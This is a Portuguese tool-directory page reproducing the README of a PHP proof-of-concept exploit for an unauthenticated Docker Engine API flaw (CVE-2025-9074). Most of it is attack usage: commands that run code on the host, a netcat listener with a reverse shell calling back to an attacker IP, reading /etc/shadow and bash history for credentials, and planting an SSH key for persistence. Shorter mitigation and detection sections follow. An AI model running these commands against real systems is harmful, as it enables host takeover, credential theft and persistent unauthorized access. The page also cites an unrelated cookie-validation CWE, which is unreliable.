Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-9074 — PHP poc, exploit for CVE-2025-9074 | Kitploit
Ferramentas/GitHubGitHub/c0gnit00/cve-2025-9074
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationLateral MovementPost-ExploitationPenetration TestingCloud SecurityCommand and ControlRemote Access ToolContainer Escape
há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
c0gnit00/cve-2025-9074

CVE-2025-9074

PHP poc, exploit for CVE-2025-9074

Ver Repositório

CVE-2025-9074: RCE não autenticado na API do Docker Engine

Gravidade: CRÍTICA | Pontuação CVSS: 9.8 (estimada) | Versões Afetadas: Docker Desktop < 4.44.3

Um exploit de prova de conceito para CVE-2025-9074, uma vulnerabilidade de Execução Remota de Código não autenticada na API do Docker Engine que permite escape de contêiner privilegiado e comprometimento do sistema host.

🔴 Visão Geral da Vulnerabilidade

CVE-2025-9074 é uma vulnerabilidade crítica no Docker Desktop que expõe a API do Docker Engine sem autenticação adequada ou isolamento de rede. Isso permite que atacantes remotos:

  • Executar comandos arbitrários com privilégios elevados
  • Escapar do isolamento do contêiner e acessar o sistema de arquivos do host
  • Estabelecer conexões de shell reverso para sistemas controlados pelo atacante
  • Comprometer todo o host de contêiner e o SO host subjacente

Vetor de Ataque

  • Exposição de Rede: API do Docker exposta em interfaces de rede (tipicamente porta 2375/TCP)
  • Sem Autenticação: A API aceita requisições sem autenticação
  • Contêineres Privilegiados: Capacidade de criar contêineres privilegiados com acesso ao sistema de arquivos do host
  • Bind Mounts: Acesso direto ao sistema de arquivos do host através de caminhos de bind mount

📋 Requisitos

  • PHP CLI (7.0+)
  • extensão curl habilitada no PHP
  • Conectividade de rede ao endpoint da API do Docker exposto
  • Docker Desktop < 4.44.3 (versão vulnerável)

Requisitos de Sistema para o Alvo

A vulnerabilidade afeta:

  • Docker Desktop for Windows < 4.44.3
  • Docker Desktop for Mac < 4.44.3
  • Docker Engine (quando exposto sem TLS)

🚀 Início Rápido

Instalação

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-9074.git
cd CVE-2025-9074

Uso Básico

Execute um único comando no host Docker:

root@kitploit:~
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami"

Shell Reverso

Estabeleça um shell reverso interativo:

root@kitploit:~
# Terminal 1: Iniciar listener
nc -lvnp 4444

# Terminal 2: Executar exploit
php poc.php -u http://192.168.65.7:2375 -m reverse -l 10.10.14.36 -p 4444

📖 Guia de Uso

Sintaxe do Comando

root@kitploit:~
php poc.php -u <url> [options]

Opções

Modo: Execução de Comando

Execute comandos únicos no alvo:

root@kitploit:~
# Comando simples
php poc.php -u http://192.168.65.7:2375 -m cmd -c "id"

# Ler arquivos do host
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/flag.txt" --cleanup

# Com limpeza
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami" --cleanup

Modo: Shell Reverso

Crie um shell interativo com callback:

root@kitploit:~
php poc.php -u http://192.168.65.7:2375 -m reverse -l 192.168.1.100 -p 4444

Exemplos Específicos por SO

Alvo Linux

root@kitploit:~
php poc.php -u http://target:2375 -m cmd -c "cat /mnt/hostfs/etc/shadow" --os linux

Alvo Windows

root@kitploit:~
php poc.php -u http://target:2375 -m cmd -c "dir C:\" --os windows

Alvo macOS

root@kitploit:~
php poc.php -u http://target:2375 -m cmd -c "ls -la /mnt/hostfs/Users/" --os mac

🎯 Cenários de Exploração no Mundo Real

1. Reconhecimento

root@kitploit:~
# Enumerar sistema host
php poc.php -u http://192.168.65.7:2375 -m cmd -c "uname -a"
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami"

2. Coleta de Credenciais

root@kitploit:~
# Extrair arquivos sensíveis
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/root/.bash_history"
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/etc/passwd"

3. Persistência

root@kitploit:~
# Adicionar chave SSH
php poc.php -u http://192.168.65.7:2375 -m cmd -c "mkdir -p /mnt/hostfs/root/.ssh && echo 'SSH_KEY' >> /mnt/hostfs/root/.ssh/authorized_keys"

4. Movimentação Lateral

root@kitploit:~
# Enumerar contêineres e redes em execução
php poc.php -u http://192.168.65.7:2375 -m cmd -c "docker ps --all"

🔍 Detalhes Técnicos

Mecanismo da Vulnerabilidade

  1. Socket/API Docker Exposta: API do Docker escuta em 0.0.0.0:2375 sem autenticação
  2. Criação de Contêiner Privilegiado: O POC cria contêineres privilegiados via /containers/create
  3. Vinculação do Sistema de Arquivos do Host: Contêineres usam bind mounts para acessar o sistema de arquivos do host:
    • Linux: /:/mnt/hostfs
    • macOS: /:/mnt/hostfs
    • Windows: /mnt/host/c:/mnt/hostfs
  4. Execução de Comando: Comandos executam com privilégios root/SYSTEM dentro do contêiner
  5. Acesso ao Sistema de Arquivos do Host: Acesso direto de leitura/escrita aos caminhos /mnt/hostfs

Fluxo do Payload

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│ poc.php (Sua Máquina)                               │
└────────────┬────────────────────────────────────────┘
             │ Chamada HTTP REST API
             ▼
┌─────────────────────────────────────────────────────┐
│ Docker API (Porta Alvo 2375) [NÃO AUTENTICADO]      │
└────────────┬────────────────────────────────────────┘
             │ Cria Contêiner
             ▼
┌─────────────────────────────────────────────────────┐
│ Contêiner Alpine Privilegiado                        │
│ ├─ Acesso Root Completo                            │
│ ├─ Bind Mount: /:/mnt/hostfs                       │
│ └─ Executa Comando do Atacante                      │
└────────────┬────────────────────────────────────────┘
             │ Saída do Comando
             ▼
┌─────────────────────────────────────────────────────┐
│ Saída Retornada ao Atacante                          │
└─────────────────────────────────────────────────────┘

Análise de Código

  • Interação com a API do Docker: Usa cURL para comunicação com a API REST HTTP/1.1
  • Demultiplexação de Log do Docker: Lida adequadamente com o formato de fluxo multiplexado do Docker
  • Suporte Multiplataforma: Adapta caminhos de bind mount para Windows/Mac/Linux
  • Tratamento de Timeout: Timeout de 60 segundos para comandos de longa duração

🛡️ Mitigação

Ações Imediatas

  1. Atualizar o Docker Desktop

    root@kitploit:~
    # Atualizar para versão 4.44.3 ou posterior
    
  2. Isolamento de Rede

    • Restringir a porta da API do Docker (2375) apenas ao localhost
    • Usar regras de firewall para bloquear acesso externo
    • Desabilitar a exposição do socket da API do Docker
  3. Habilitar Autenticação TLS

    root@kitploit:~
    # Configurar daemon do Docker com certificados TLS
    # Em daemon.json:
    {
      "tlsverify": true,
      "tlscacert": "/etc/docker/ca.pem",
      "tlscert": "/etc/docker/server-cert.pem",
      "tlskey": "/etc/docker/server-key.pem"
    }
    
  4. Segmentação de Rede

    • Executar Docker Desktop em redes isoladas
    • Implementar acesso de rede de confiança zero
    • Usar VPNs para acesso remoto

Configurações do Docker Desktop

  • Windows/Mac: Desabilitar "Expor daemon em tcp://localhost:2375"
  • Usar socket Unix (/var/run/docker.sock) apenas para acesso local
  • Implementar autenticação via Contexto do Docker com credenciais

📊 Detecção

Detecção de Rede

root@kitploit:~
# Escanear por APIs Docker expostas
nmap -p 2375,2376 -sV target_network

# Verificar se a porta responde à API Docker
curl -s http://target:2375/version

Detecção de Log

  • Monitorar logs do daemon do Docker para chamadas de API incomuns
  • Alertar sobre criação de contêiner privilegiado
  • Rastrear padrões de uso de bind mount

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais.

  • Use este POC apenas em sistemas que você possui ou tem permissão explícita para testar
  • O acesso não autorizado a sistemas de computador é ilegal
  • Os usuários assumem total responsabilidade por suas ações
  • Este POC é para testes de penetração autorizados e pesquisa de vulnerabilidades

📝 Referências

  • Segurança do Docker Engine
  • Documentação da API do Docker
  • Detalhes do CVE-2025-9074
  • CWE-784: Dependência de Cookies sem Validação Adequada

🤝 Contribuição

Contribuições são bem-vindas! Sinta-se à vontade para enviar issues ou pull requests.

📄 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.

👤 Autor

Pesquisador de Segurança | Testador de Penetração


Última Atualização: Maio de 2025 | Status: Pesquisa Ativa

Baixar ferramenta
OpçãoCurtoObrigatórioDescrição
--url-u✅ SimURL da API do Docker (ex.: http://1.2.3.4:2375)
--mode-m❌ NãoModo de execução: cmd ou reverse (padrão: cmd)
--cmd-c⚠️ Para modo cmdComando a executar no alvo
--lhost-l⚠️ Para modo reverseSeu endereço IP para callback
--lport-p❌ NãoSua porta de escuta (padrão: 4444)
--os—❌ NãoSO alvo: linux, mac, windows (padrão: linux)
--cleanup—❌ NãoRemover contêiner após execução
--help-h❌ NãoExibir mensagem de ajuda